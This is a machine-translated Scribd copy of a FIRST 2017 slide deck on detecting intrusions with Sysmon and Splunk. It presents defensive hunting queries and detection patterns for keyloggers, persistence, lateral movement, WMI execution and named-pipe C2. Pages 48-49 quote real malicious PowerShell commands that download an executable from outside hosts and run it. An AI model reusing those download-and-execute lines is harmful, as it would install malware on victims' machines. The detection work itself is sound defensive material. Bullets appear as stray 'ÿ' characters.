Scribd
Upload
171 views119 pages

Advanced Incident Detection and Threat Hunting

Tom Ueltschi gives a presentation on using Sysmon and Splunk for advanced incident detection and threat hunting. He outlines how Sysmon provides valuable system activity logs that can be analyzed in Splunk to detect threats. The presentation covers example threat hunting queries and analytics related to malware delivery, persistence methods, lateral movement, and credential access. It also discusses resources like MITRE ATT&CK matrices, the Threat Hunting Project, Sigma rules, and Sysmon projects that can help build effective threat hunting capabilities.

Uploaded by

Fernandes Moura
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
171 views119 pages

Advanced Incident Detection and Threat Hunting

Tom Ueltschi gives a presentation on using Sysmon and Splunk for advanced incident detection and threat hunting. He outlines how Sysmon provides valuable system activity logs that can be analyzed in Splunk to detect threats. The presentation covers example threat hunting queries and analytics related to malware delivery, persistence methods, lateral movement, and credential access. It also discusses resources like MITRE ATT&CK matrices, the Threat Hunting Project, Sigma rules, and Sysmon projects that can help build effective threat hunting capabilities.

Uploaded by

Fernandes Moura
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 119

Machine Translated by Google

Advanced Incident Detection and


Threat Hunting using Sysmon
(and Splunk)
Tom Ueltschi, Swiss Post CERT

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE page 1
Machine Translated by Google

C:\> whoami /all

ÿ Tom Ueltschi

ÿ Swiss Post CERT / SOC / CSIRT, since 2007 (10 years!)

– Focus: Malware Analysis, Threat Intel, Threat Hunting, Red Teaming

ÿ Talks about «Ponmocup Hunter» (Botconf, DeepSec, SANS DFIR Summit)


ÿ BotConf 2016 talk with same title

ÿ Member of many trust groups / infosec communities

ÿ FIRST SIG member (Malware Analysis, Red Teaming)

ÿ Twitter: @c_APT_ure

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 2
Machine Translated by Google

Outline

ÿ Introduction on Sysmon and public resources


ÿ Brief recap of BotConf talk with examples
ÿ Threat Hunting & Advanced Detection examples
– Malware Delivery – Persistence Methods
– Internal Recon – Lateral Movement

– Internal Peer-to-Peer C2 using Named Pipes


– Detecting Mimikatz (even file-less / in-memory)
FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 3
Machine Translated by Google

Standing on the Shoulders of Giants

ÿ It’s hard to come up


with totally new ideas
and approaches
ÿ Know and use what’s
already available out
there

ÿ Share experiences
what works and how

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE page 4
Machine Translated by Google

Pyramid of Pain

I want to be able
to detect this!

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE page 5
Machine Translated by Google

Sqrrl on Threat Hunting

Most examples
are belong to here
FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE page 6
Machine Translated by Google

Sqrrl on Threat Hunting

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 7
Machine Translated by Google

Sqrrl on Threat Hunting

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE page 8
Machine Translated by Google

MITER ATT&CK Matrix (Tactics)

ÿ Examples will cover ÿ


Persistence (Registry, Filesystem)
ÿ Discovery / Lateral Movement / Execution (WMI)
ÿ Command and Control (Named
Pipes) ÿ Credential Access (Mimikatz)
FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 9
Machine Translated by Google

MITER ATT&CK Matrix (Technical)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 10
Machine Translated by Google

MITER ATT&CK Matrix (Technical)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 11
Machine Translated by Google

MITER ATT&CK Matrix (DGA)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE page 12
Machine Translated by Google

MITER ATT&CK Matrix (T&T)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 13
Machine Translated by Google

MITER ATT&CK Matrix (ABDC)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 14
Machine Translated by Google

MITER ATT&CK Matrix


Contributions
are welcome

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 15
Machine Translated by Google

MITRE Cyber Analytics Repository

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 16
Machine Translated by Google

MITRE Cyber Analytics Repository

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 17
Machine Translated by Google

MITRE CARET (Analytics ÿ T&T Matrix)

Map Analytics
to T&T Matrix

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 18
Machine Translated by Google

MITRE CARET (Analytics ÿ T&T Matrix)

CAR: Exec of susp cmds


T&T: Discovery / many

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 19
Machine Translated by Google

MITRE CARET (Analytics ÿ T&T Matrix)

CAR: Remote exec via WMI


T&T: Execution / WMI

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 20
Machine Translated by Google

Threat Hunting Project

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 21
Machine Translated by Google

Threat Hunting Project

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 22
Machine Translated by Google

ThreatHunter Playbook

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 23
Machine Translated by Google

Florian Roth’s Sigma Project

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 24
Machine Translated by Google

Florian Roth’s Sigma Project

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 25
Machine Translated by Google

Florian Roth’s Sigma Project

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 26
Machine Translated by Google

Florian Roth’s Sigma Project

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 27
Machine Translated by Google

Florian Roth’s Sigma Project

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 28
Machine Translated by Google

Florian Roth’s Sigma Project

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 29
Machine Translated by Google

Florian Roth’s Sigma Project

Way to go, Neo! ÿ

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 30
Machine Translated by Google

Thomas Patzke’s EQUEL Project

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 31
Machine Translated by Google

Mike Haag's Sysmon DFIR Github

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 32
Machine Translated by Google

Why Sysmon? RSA Con Talk M.R.

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 33
Machine Translated by Google

Why Sysmon? RSA Con Talk M.R.

Time
stomping

DLL / Proc
Injection

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 34
Machine Translated by Google

Why Sysmon? RSA Con Talk M.R.

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 35
Machine Translated by Google

Why Sysmon? RSA Con Talk M.R.


New event types v5 & v6
Not covered in prev talk

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 36
Machine Translated by Google

Why Sysmon? RSA Con Talk M.R.

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 37
Machine Translated by Google

Why Sysmon? RSA Con Talk M.R.

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 38
Machine Translated by Google

Why Sysmon? RSA Con Talk M.R.

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 39
Machine Translated by Google

SwiftOnSecurity’s Sysmon configs

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 40
Machine Translated by Google

Brief Recap of BotConf 2016 Talk

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 41
Machine Translated by Google

Recap BotConf Talk (1/2)


Using the free Sysmon tool you can search / alert for
known malicious process behaviors

ÿ Image names / paths (wrong paths)


ÿ svchost.exe, %APPDATA%\Oracle\bin\javaw.exe
ÿ CommandLine parameters
ÿ /stext, vssadmin delete shadows, rundll32 qwerty
ÿ Parent- / Child-Process relationships
ÿ winword.exe ÿ explorer.exe, wscript.exe ÿ rundll32.exe
ÿ Process injection
ÿ # winlogon.exe

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 42
Machine Translated by Google

Recap BotConf Talk (2/2)


Using the free Sysmon tool you can hunt for
suspicious process behaviors

ÿ Lateral movement using admin shares ÿ


ADMIN$, C$, IPC$ (\\127.0.0.1\...)
ÿ Internal C&C P2P comms over named pipes / SMB ÿ
processes using port 445 between workstations
ÿ Rarest processes connecting thru proxy (or directly to Internet) ÿ
count by hashes, IMPHASHes, clients, image names
ÿ Suspicious Powershell activity ÿ
Powershell -EncodedCommand | -enc …

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 43
Machine Translated by Google

Advanced Detection (Adwind RAT)


alert_sysmon_java-malware-infection JBifrost RAT
index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1"
(Users AppData Roaming (javaw.exe OR xcopy.exe)) OR (cmd cscript vbs)
| search Image="*\\AppData\\Roaming\\Oracle\\bin\\java*.exe*"
OR (Image="*\\xcopy.exe*" CommandLine="*\\AppData\\Roaming\\Oracle\\*")
OR CommandLine="*cscript*Retrive*.vbs*"

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 44
Machine Translated by Google

Detecting Keyloggers
ÿ Keyloggers and Password-Stealers abusing NirSoft tools
ÿ Limitless Logger
ÿ Predator Pain
ÿ HawkEye Keylogger
ÿ iSpy Keylogger
ÿ KeyBase Keylogger
CommandLine: <PATH-TO-EXE>\*.exe /stext <PATH-TO-TXT>\*.txt CommandLine:
<PATH-TO-EXE>\*.exe /scomma ...

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" ( stext OR scomma )


| search CommandLine="* /
stext *" OR CommandLine="* /scomma *"

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 45
Machine Translated by Google

Detecting Keyloggers
ÿ BONUS: detecting new Banking Trojan variant (Heodo/Emotet)

ÿ Link in email to download JS from web server (DHL__Report__*.js)


ÿ Executing JS downloads EXE from web server
ÿ EXE uses «/scomma» parameter (YARA: NirSoft strings in memory)
FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 46
Machine Translated by Google

Detecting Keyloggers
ÿ BONUS: detecting new Banking Trojan variant (Heodo/Emotet)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 47
Machine Translated by Google

Malicious PowerShell
index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1"
(powershell.exe OR cmd.exe)
| eval CommandLine2=replace(CommandLine,"[ '+\"\^]","")
| search (Image="*\\powershell.exe" OR Image="*\\cmd.exe")
CommandLine2="*WebClient*" CommandLine2="*DownloadFile*"

"C:\Windows\System32\cmd.exe" /c powershell -command (("New-Object


Net.WebClient")).("'Do' + 'wnloadfile'").invoke( 'http://unofficialhr.top/tv/
homecooking/tenderloin.php', 'C:\Users\***\AppData\Local\Temp\spasite.exe'); & "C:
\Users\***\AppData\Local\Temp\spasite.exe"
Remove all
obfuscation chars
CommandLine2:
C:\Windows\System32\cmd.exe/cpowershell-command((New-ObjectNet.WebClient)).
(Downloadfile).invoke(http://unofficialhr.top/tv/homecooking/tenderloin.php, C:
\Users\purpural\AppData\Local\Temp\spasite.exe);& C:
\Users\purpural\AppData\Local\Temp\spasite.exe

ÿ De-obfuscate simple obfuscation techniques


Are all (obfuscation) problems solved?
FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 48
Machine Translated by Google

Malicious PowerShell
cmd.exe /c powershell -c $eba = ('exe'); $sad = ('wnloa'); (( New-Object
Net.WebClient )).( 'Do' + $sad + 'dfile' ).invoke( 'http://golub.histosol.ch/
bluewin/mail/inbox.php'
'C:\Users\*****\AppData\Local\Temp\doc.' + $eba); start('C:
\Users\*****\AppData\Local\Temp\doc.' + $eba)

«De-obfuscated»:

powershell-c$eba=(exe);$sad=(wnloa);((New-ObjectNet.WebClient)).(Do$saddfile)
.invoke(http://golub.histosol.ch/bluewin/mail/inbox.phpC:\Users\*****\AppData
\Local\Temp\doc.$eba); start(C:\Users\*****\AppData\Local\Temp\doc.$eba)

LNK with Powershell command


- embedded in DOCX file (oleObject.bin) Query doesn’t match
«DownloadFile»
Sample from 2016-11-18
d8af6037842458f7789aa6b30d6daefb Billing # 5616147.docx
2b9c71fe5f121ea8234aca801c3bb0d9 Beleg Nr. 892234-32.lnk

Strings from oleObject.bin:


E:\TEMP\G\18.11.16\ch1\golub\Document no. 892234-32.lnk
C:\Users\ie\AppData\Local\Temp\Beleg Nr. 892234-32.lnk

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 49
Machine Translated by Google

Processes connecting thru Proxy


index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=1
[

search index=sysmon SourceName="Microsoft-Windows-Sysmon"


EventCode=3 Image="*\\Users\\*"
DestinationHostname="proxy.fqdn"
| stats by ComputerName ProcessGuid
| fields ComputerName ProcessGuid
]

| fields Hashes ComputerName Image ParentImage


| rex field=Hashes ".*MD5=(?<MD5>[A-F0-9]*),IMPHASH=(?<IMPHASH>[A-F0-9]*)"
| rex field=Image ".*\\\\Users\\\\(?<username>[^\\\\]+)\\\\.*" | rex field=Image ".*\\\\+(?<proc_name>[^\\\\]+
\.[eE][xX][eE]).*" | rex field=ParentImage ".*\\\\+(?<pproc_name>[^\\\\]+\.[eE][xX][eE]).*" | stats dc(ComputerName)
AS CLIENTS, dc(MD5) AS CNT_MD5,

dc(Image) AS CNT_IMAGE, values(username) AS Users,


values(ComputerName) AS Computers, values(MD5) AS MD5,
values(proc_name) AS proc_name, values(pproc_name) AS pproc_name
by IMPHASH
| where CLIENTS < 15
| sort –CLIENTS

ÿ IMPHASH = Import Hash


FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 50
Machine Translated by Google

SMB traffic between WS


index=sysmon SourceName="Microsoft-Windows-Sysmon"
EventCode=3 Initiated=true SourceIp!=DestinationIp DestinationPort=445
Image!=System (SourceHostname="WS*"
DestinationHostname="WS*") OR (SourceIp="10.10.*.*" DestinationIp="10.10.*.*")

| stats by ComputerName ProcessGuid | fields


ComputerName ProcessGuid

ÿ Search for network connections


ÿ SMB protocol (dst port 445)
ÿ Source and destination are workstations (hostname or
IP) ÿ Use «ProcessGuid» to correlate with other event types
(proc’s) ÿ Search for legitimate SMB servers (filers,
NAS) ÿ Create «whitelist» to exclude as legit dest

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 51
Machine Translated by Google

Lateral Movement (admin shares)


CS_Lateral_Movement_psexec

10/18/2016 11:17:12 PM
LogName=Microsoft-Windows-Sysmon/Operational
SourceName=Microsoft-Windows-Sysmon
EventCode=1
EventType=4
C:\Windows\system32\services.exe
Type=Information
... ÿ \\127.0.0.1\ADMIN$\8c0cb58.exe
Message=Process Create: Image:
\\127.0.0.1\ADMIN$\8c0cb58.exe CommandLine: \
\127.0.0.1\ADMIN$\8c0cb58.exe CurrentDirectory: C:
\Windows\system32\ User: NT AUTHORITY\SYSTEM
IntegrityLevel: System ParentImage: C:
\Windows\system32\services.exe
ParentCommandLine: C:\Windows\System32\services.exe

ÿ Search for admin share names in image paths

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 52
Machine Translated by Google

Lateral Movement (admin shares)


CS_Lateral_Movement_psexec

10/18/2016 11:17:13 PM
LogName=Microsoft-Windows-Sysmon/Operational
SourceName=Microsoft-Windows-Sysmon
EventCode=1
C:\Windows\system32\services.exe
EventType=4
ÿ \\127.0.0.1\ADMIN$\8c0cb58.exe
Type=Information
... ÿ C:\Windows\system32\rundll32.exe
Message=Process Create: Image:
C:\Windows\SysWOW64\rundll32.exe CommandLine: C:
\Windows\System32\rundll32.exe CurrentDirectory: C:
\Windows\system32\ User: NT AUTHORITY\SYSTEM
IntegrityLevel: System ParentImage: \
\127.0.0.1\ADMIN$\8c0cb58.exe
ParentCommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe

ÿ Search for admin share names in image paths

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 53
Machine Translated by Google

Lateral Movement (proc injection)


CS_Lateral_Movement_psexec

10/18/2016 11:17:13 PM
LogName=Microsoft-Windows-Sysmon/Operational
SourceName=Microsoft-Windows-Sysmon
EventCode=8
\\127.0.0.1\ADMIN$\8c0cb58.exe
EventType=4
Type=Information # C:\Windows\system32\rundll32.exe
...
Message=CreateRemoteThread detected:
SourceProcessId: 29340
SourceImage: \\127.0.0.1\ADMIN$\8c0cb58.exe TargetProcessId:
18476 TargetImage: C:
\Windows\SysWOW64\rundll32.exe NewThreadId: 20060
StartAddress:
0x0000000000110000 StartFunction:

ÿ Search for rarest source or target images from proc injection

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 54
Machine Translated by Google

Keylogger (proc injection)


CS_Keylogger_injection

10/26/2016 11:56:32 PM
LogName=Microsoft-Windows-Sysmon/Operational
SourceName=Microsoft-Windows-Sysmon
EventCode=8
EventType=4 C:\Windows\SysWOW64\rundll32.exe
Type=Information # C:\Windows\system32\winlogon.exe
...
Message=CreateRemoteThread detected:
SourceProcessId: 17728
SourceImage: C:\Windows\SysWOW64\rundll32.exe TargetProcessId:
836 TargetImage: C:
\Windows\System32\winlogon.exe NewThreadId: 14236 StartAddress:
0x0000000000C20000
StartFunction:

ÿ Suspicious proc injection into «winlogon.exe» ÿ


Steal user’s password while logging on or unlocking screensaver
FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 55
Machine Translated by Google

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 56
Machine Translated by Google

Hunting for Delivery of Malware

ÿ Malicious files downloaded via Browser

ÿ Sysmon «FileCreateStreamHash» events generated

ÿ Remember the malicious JS files from email links? (Heodo/Emotet)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 57
Machine Translated by Google

Hunting for Delivery of Malware

ÿ Remember that JS Filename from before?

ÿ Let’s hunt for that… (DHL__Report__*.js)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 58
Machine Translated by Google

Hunting for Delivery of Malware

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 59
Machine Translated by Google

Hunting for Delivery of Malware

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 60
Machine Translated by Google

Hunting for Delivery of Malware

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 61
Machine Translated by Google

Hunting for Delivery of Malware

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 62
Machine Translated by Google

Hunting for Delivery of Malware

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 63
Machine Translated by Google

Detecting Persistence Methods

ÿ Hunting for Persistence Methods

– Registry Keys

– Filesystem (e.g. Startup folders)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 64
Machine Translated by Google

Detecting Persistence (Registry)

ÿ Searching for «Run» or «RunOnce» keys

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 65
Machine Translated by Google

Detecting Persistence (Registry)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 66
Machine Translated by Google

Detecting Persistence (Registry)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 67
Machine Translated by Google

Detecting Persistence (Filesystem)

ÿ Example for «ProcessCreate», not «FileCreate»

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 68
Machine Translated by Google

Detecting Persistence (Filesystem)

This should make


you go «Hmmm??»

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 69
Machine Translated by Google

Detecting Persistence (Filesystem)

ÿ Example for «FileCreate»

ÿ Less than 400 results in > 2 months

ÿ after tuning exclusion list

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 70
Machine Translated by Google

Detecting Persistence (Filesystem)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 71
Machine Translated by Google

Detecting Persistence (Filesystem)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 72
Machine Translated by Google

Detecting Internal Recon

ÿ Internal Recon used as preparation for Lateral Movement

ÿ Legit system commands used

ÿ Can also be used by sysadmins or users

ÿ Baseline and find appropriate thresholds


– Number of different commands and time window

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 73
Machine Translated by Google

Detecting Internal Recon

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 74
Machine Translated by Google

Detecting Internal Recon

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 75
Machine Translated by Google

Detecting Internal Recon

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 76
Machine Translated by Google

Detecting Internal Recon

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 77
Machine Translated by Google

Detecting Internal Recon

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 78
Machine Translated by Google

Detecting Internal Recon


ÿ 3 or more (of 7) different commands executed within 15 min

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 79
Machine Translated by Google

Detecting Internal Recon

15 occurences
6 diff cmds
within 15 mins
FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 80
Machine Translated by Google

Detecting Internal Recon


«False detections»
are possible
Explorer -> cmd.exe

3 diff cmds
within 3 mins
FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 81
Machine Translated by Google

Lateral Movement

ÿ Lateral Movement using WMI for Execution

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 82
Machine Translated by Google

ATT&CK TTP on WMI

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 83
Machine Translated by Google

Who’s (ab-)using WMI


ÿ Point 1

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 84
Machine Translated by Google

Who’s (ab-)using WMI

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 85
Machine Translated by Google

Who’s (ab-)using WMI

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 86
Machine Translated by Google

Who’s (ab-)using WMI

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 87
Machine Translated by Google

Who’s (ab-)using WMI

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 88
Machine Translated by Google

Who’s (ab-)using WMI

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 89
Machine Translated by Google

Testing with WMImplant


ÿ Testing «command_exec» using WMImplant with PS-ISE

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 90
Machine Translated by Google

Testing with WMImplant


ÿ Testing «process_start» using WMImplant with Beacon

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 91
Machine Translated by Google

Detecting WMI spawned proc’s


ÿ Point 1

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 92
Machine Translated by Google

Detecting WMI spawned proc’s


ÿ Point 1

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 93
Machine Translated by Google

Detecting WMI spawned proc’s


ÿ Searching for Child-Process creations of «wmiprvse.exe»
ÿ Filtering out «known good» processes

ÿ Don’t filter out «Powershell.exe» in general


ÿ Combine with «CommandLine» params
FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 94
Machine Translated by Google

Detecting WMI spawned proc’s


ÿ Command executions («powershell *$env:*» and IEX, obfusc.)
ÿ Processes started (calc.exe, notepad.exe …)

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 95
Machine Translated by Google

Detecting WMI spawned proc’s


ÿ Also detecting CS Beacons WMI Lateral Movement method ÿ
«powershell.exe … -encodedcommand …»

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 96
Machine Translated by Google

Internal P2P C2 using Named Pipes

ÿ Internal Peer-to-Peer C&C using Named Pipes over SMB

ÿ Using Cobalt Strike Beacon’s features for testing

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 97
Machine Translated by Google

Cobalt Strike Features


Only one egress point
using HTTP as C&C
Conn thru web proxy

SMB traffic
SMB traffic
between WS
between WS
Named Pipes C&C

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 98
Machine Translated by Google

Detecting C2 usingNamed Pipes


ÿ Search for Processes

ÿ Connecting through Web Proxy and


ÿ Creating Named Pipes

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Page 99
Machine Translated by Google

Detecting C2 usingNamed Pipes

